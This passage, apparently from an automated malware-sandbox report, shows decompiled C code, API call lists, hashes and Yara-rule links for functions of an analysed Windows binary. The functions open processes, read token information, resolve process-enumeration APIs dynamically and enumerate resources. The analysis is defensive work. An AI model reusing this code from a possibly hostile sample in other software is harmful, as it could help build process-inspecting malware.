                                                                                                                                                                                                                          0x004064bb
                                                                                                                                                                                                                          0x004064cd
                                                                                                                                                                                                                          0x004064d2
                                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                                          0x004064ea
                                                                                                                                                                                                                          0x004064ea
                                                                                                                                                                                                                          0x004064f3
                                                                                                                                                                                                                          0x00406503
                                                                                                                                                                                                                          0x00406514
                                                                                                                                                                                                                          0x00406525
                                                                                                                                                                                                                          0x0040653b
                                                                                                                                                                                                                          0x0040654e
                                                                                                                                                                                                                          0x00406568
                                                                                                                                                                                                                          0x00406572
                                                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                                                          0x00406582
                                                                                                                                                                                                                          0x0040658a
                                                                                                                                                                                                                          0x00406596

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406484
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004064A0
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                                                                          • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                          • API String ID: 3037099051-2314623505
                                                                                                                                                                                                                          • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                                                          0x00409ab7
                                                                                                                                                                                                                          0x00409ac8
                                                                                                                                                                                                                          0x00409acf
                                                                                                                                                                                                                          0x00409ad4
                                                                                                                                                                                                                          0x00409ae0
                                                                                                                                                                                                                          0x00409ae6
                                                                                                                                                                                                                          0x00409ae8
                                                                                                                                                                                                                          0x00409af0
                                                                                                                                                                                                                          0x00409c3a
                                                                                                                                                                                                                          0x00409c41
                                                                                                                                                                                                                          0x00409c67
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c67
                                                                                                                                                                                                                          0x00409c49
                                                                                                                                                                                                                          0x00409c50
                                                                                                                                                                                                                          0x00409c51
                                                                                                                                                                                                                          0x00409c56
                                                                                                                                                                                                                          0x00409c57
                                                                                                                                                                                                                          0x00409c5a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c64
                                                                                                                                                                                                                          0x00409b00
                                                                                                                                                                                                                          0x00409b03
                                                                                                                                                                                                                          0x00409b06
                                                                                                                                                                                                                          0x00409b0b
                                                                                                                                                                                                                          0x00409b10
                                                                                                                                                                                                                          0x00409ba9
                                                                                                                                                                                                                          0x00409bac
                                                                                                                                                                                                                          0x00409bc1
                                                                                                                                                                                                                          0x00409bc7
                                                                                                                                                                                                                          0x00409bcc
                                                                                                                                                                                                                          0x00409bd8
                                                                                                                                                                                                                          0x00409bf0
                                                                                                                                                                                                                          0x00409bf2
                                                                                                                                                                                                                          0x00409c23
                                                                                                                                                                                                                          0x00409c26
                                                                                                                                                                                                                          0x00409c2f
                                                                                                                                                                                                                          0x00409c34
                                                                                                                                                                                                                          0x00409c34
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c2f
                                                                                                                                                                                                                          0x00409bf7
                                                                                                                                                                                                                          0x00409bfb
                                                                                                                                                                                                                          0x00409c02
                                                                                                                                                                                                                          0x00409c06
                                                                                                                                                                                                                          0x00409c0d
                                                                                                                                                                                                                          0x00409c14
                                                                                                                                                                                                                          0x00409c17
                                                                                                                                                                                                                          0x00409c18
                                                                                                                                                                                                                          0x00409c1b
                                                                                                                                                                                                                          0x00409c1e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c1e
                                                                                                                                                                                                                          0x00409b1f
                                                                                                                                                                                                                          0x00409b25
                                                                                                                                                                                                                          0x00409b2a
                                                                                                                                                                                                                          0x00409b2d
                                                                                                                                                                                                                          0x00409b33
                                                                                                                                                                                                                          0x00409b3d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b4b
                                                                                                                                                                                                                          0x00409b53
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b6a
                                                                                                                                                                                                                          0x00409b6c
                                                                                                                                                                                                                          0x00409b6e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b77
                                                                                                                                                                                                                          0x00409b7b
                                                                                                                                                                                                                          0x00409b82
                                                                                                                                                                                                                          0x00409b86
                                                                                                                                                                                                                          0x00409b8d
                                                                                                                                                                                                                          0x00409b8e
                                                                                                                                                                                                                          0x00409b94
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409BC7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                                                                                                                          • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                                                                                                                          • API String ID: 3504373036-27875219
                                                                                                                                                                                                                          • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                                                                                                                          0x00409179
                                                                                                                                                                                                                          0x00409209
                                                                                                                                                                                                                          0x00409209
                                                                                                                                                                                                                          0x00409185
                                                                                                                                                                                                                          0x0040918a
                                                                                                                                                                                                                          0x0040918f
                                                                                                                                                                                                                          0x00409208
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409191
                                                                                                                                                                                                                          0x0040919e
                                                                                                                                                                                                                          0x004091a2
                                                                                                                                                                                                                          0x004091a7
                                                                                                                                                                                                                          0x004091af
                                                                                                                                                                                                                          0x004091b3
                                                                                                                                                                                                                          0x004091b8
                                                                                                                                                                                                                          0x004091c0
                                                                                                                                                                                                                          0x004091c4
                                                                                                                                                                                                                          0x004091c9
                                                                                                                                                                                                                          0x004091d1
                                                                                                                                                                                                                          0x004091d5
                                                                                                                                                                                                                          0x004091da
                                                                                                                                                                                                                          0x004091e2
                                                                                                                                                                                                                          0x004091e6
                                                                                                                                                                                                                          0x004091eb
                                                                                                                                                                                                                          0x004091ed
                                                                                                                                                                                                                          0x004091ed
                                                                                                                                                                                                                          0x004091eb
                                                                                                                                                                                                                          0x004091da
                                                                                                                                                                                                                          0x004091c9
                                                                                                                                                                                                                          0x004091b8
                                                                                                                                                                                                                          0x004091ff
                                                                                                                                                                                                                          0x00409202
                                                                                                                                                                                                                          0x00409202
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004091ff

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1182944575-70141382
                                                                                                                                                                                                                          • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                                                                                          0x004090f5
                                                                                                                                                                                                                          0x00409171
                                                                                                                                                                                                                          0x00409171
                                                                                                                                                                                                                          0x004090fd
                                                                                                                                                                                                                          0x00409103
                                                                                                                                                                                                                          0x00409107
                                                                                                                                                                                                                          0x00409170
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409170
                                                                                                                                                                                                                          0x00409116
                                                                                                                                                                                                                          0x0040911a
                                                                                                                                                                                                                          0x0040911f
                                                                                                                                                                                                                          0x00409127
                                                                                                                                                                                                                          0x0040912b
                                                                                                                                                                                                                          0x00409130
                                                                                                                                                                                                                          0x00409138
                                                                                                                                                                                                                          0x0040913c
                                                                                                                                                                                                                          0x00409141
                                                                                                                                                                                                                          0x00409149
                                                                                                                                                                                                                          0x0040914d
                                                                                                                                                                                                                          0x00409152
                                                                                                                                                                                                                          0x0040915a
                                                                                                                                                                                                                          0x0040915e
                                                                                                                                                                                                                          0x00409163
                                                                                                                                                                                                                          0x00409165
                                                                                                                                                                                                                          0x00409165
                                                                                                                                                                                                                          0x00409163
                                                                                                                                                                                                                          0x00409152
                                                                                                                                                                                                                          0x00409141
                                                                                                                                                                                                                          0x00409130
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                                                                                                                          0x00409faf
                                                                                                                                                                                                                          0x00409fb4
                                                                                                                                                                                                                          0x00409fb5
                                                                                                                                                                                                                          0x00409fb6
                                                                                                                                                                                                                          0x0040a043
                                                                                                                                                                                                                          0x0040a04a
                                                                                                                                                                                                                          0x0040a058
                                                                                                                                                                                                                          0x0040a05f
                                                                                                                                                                                                                          0x0040a06d
                                                                                                                                                                                                                          0x0040a074
                                                                                                                                                                                                                          0x0040a08e
                                                                                                                                                                                                                          0x0040a099
                                                                                                                                                                                                                          0x0040a0ab
                                                                                                                                                                                                                          0x0040a0c9
                                                                                                                                                                                                                          0x0040a0ce
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a0ce
                                                                                                                                                                                                                          0x00409fc3
                                                                                                                                                                                                                          0x00409fca
                                                                                                                                                                                                                          0x00409fd8
                                                                                                                                                                                                                          0x00409fdf
                                                                                                                                                                                                                          0x00409ff9
                                                                                                                                                                                                                          0x0040a006
                                                                                                                                                                                                                          0x0040a018
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                          • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                                                                                          0x00406216
                                                                                                                                                                                                                          0x0040621b
                                                                                                                                                                                                                          0x00406222
                                                                                                                                                                                                                          0x0040625f
                                                                                                                                                                                                                          0x00406263
                                                                                                                                                                                                                          0x00406269
                                                                                                                                                                                                                          0x00406271
                                                                                                                                                                                                                          0x00406273
                                                                                                                                                                                                                          0x00406289
                                                                                                                                                                                                                          0x00406289
                                                                                                                                                                                                                          0x0040628e
                                                                                                                                                                                                                          0x0040628f
                                                                                                                                                                                                                          0x004062a9
                                                                                                                                                                                                                          0x004062ab
